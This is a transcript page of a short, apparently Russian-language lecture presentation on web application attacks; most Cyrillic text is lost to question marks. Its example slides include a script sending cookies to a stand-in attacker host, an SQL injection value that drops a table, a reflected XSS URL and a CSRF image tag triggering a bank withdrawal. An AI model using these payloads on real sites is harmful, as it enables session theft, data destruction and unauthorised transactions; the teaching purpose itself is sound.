WWW-???????: - PowerPoint PPT Presentation

1 / 9
About This Presentation
Title:

WWW-???????:

Description:

Title: Author: V. Petukhin Last modified by: V. Petukhin Created Date: 5/15/2004 2:02:19 AM Document presentation ... – PowerPoint PPT presentation

Number of Views:27
Avg rating:3.0/5.0
Slides: 10
Provided by: V445
Category:
Tags: www | csrf

less

Transcript and Presenter's Notes

Title: WWW-???????:


1
?????????? ?????? ? ??????????? ?? ????????????
2
???? ???? ?? ?????
  • ????????? ????????? ?????????? (?????? ? ?.?.)
  • ????????? ???????????????? ??????????
  • ????????? ?????? ?? ?????, ???????? ??????
  • ?????? ??????????? ??????, ?????????? ?????????
    ??????????

3
???????? ???? ?? ?????
  • WWW-???????
  • ???????????? ???????
  • HTTP-??????
  • ????????? ??????????
  • ???-??????????
  • WWW-???????
  • ???????????? ??????? (????????? ???????)
  • ????????? cookie, ?????????? ?? ??????????

4
???? ??????? ????
  • DoS-????? ? DDoS-????? (Distributed Denial of
    Service)
  • ?????? (phishing)
  • ip-??????? (spoofing)
  • ????????? ???? (Spyware)
  • drive-by download (???????? ???????? ?? ??????)
  • Cross-Site Scripting (CSS) (HTML injection)
  • SQL injection
  • XSS (??????????? ?????????)
  • CSRF (Cross-site request forgery) ????? ??????
    ?????
  • ??? ????????????? ??????? ???????

5
HTML injection
  • ltscriptgt window.open("http//www.attacker.site/col
    lect.cgi?cookie"document.cookie)
  • lt/scriptgt

6
SQL injection
  • firstname _POST"firstname"
  • mysql_query("SELECT FROM users WHERE
    first_name'firstname'")
  • ???? firstname "' drop table users ", ?? ???
    ?????? ??????? ?????????????

7
XSS (??????????? ?????????)
  • firstname _GET"firstname"
  • echo "Your name firstname"
  • ???? firstname "ltscriptgtlt/scriptgt", ?? ??????
    ????? ????????
  • ?????????? ???? ????????????? ??????
  • http//hacked.ru/any.php?firstname
    ltscriptgtlt/scriptgt

8
CSRF ????? ?????? ?????
  • ????????? ??????? ????????? ?????? ??????
  • ltimg src"http//bank.example/withdraw?accountBob
    amount1000000forJohn"gt

9
?????? ?? ????????-????
  • ?????? ?? ??????? ???????
  • ????????? ???? ?? ??????????-???????
  • ????????? http-???????
  • ?????????? ???????????????? ?? ??????? ???????
  • ???????? ???????? http-????????
  • ?????? ?? ???????
  • ????? ???????????? ??????
  • ???????? ????????? http-???????
  • ????????? ???????????? ?????????
  • ???????? ?????? ???????? ??????? ?
    ???????????????? ??????
Write a Comment
User Comments (0)
About PowerShow.com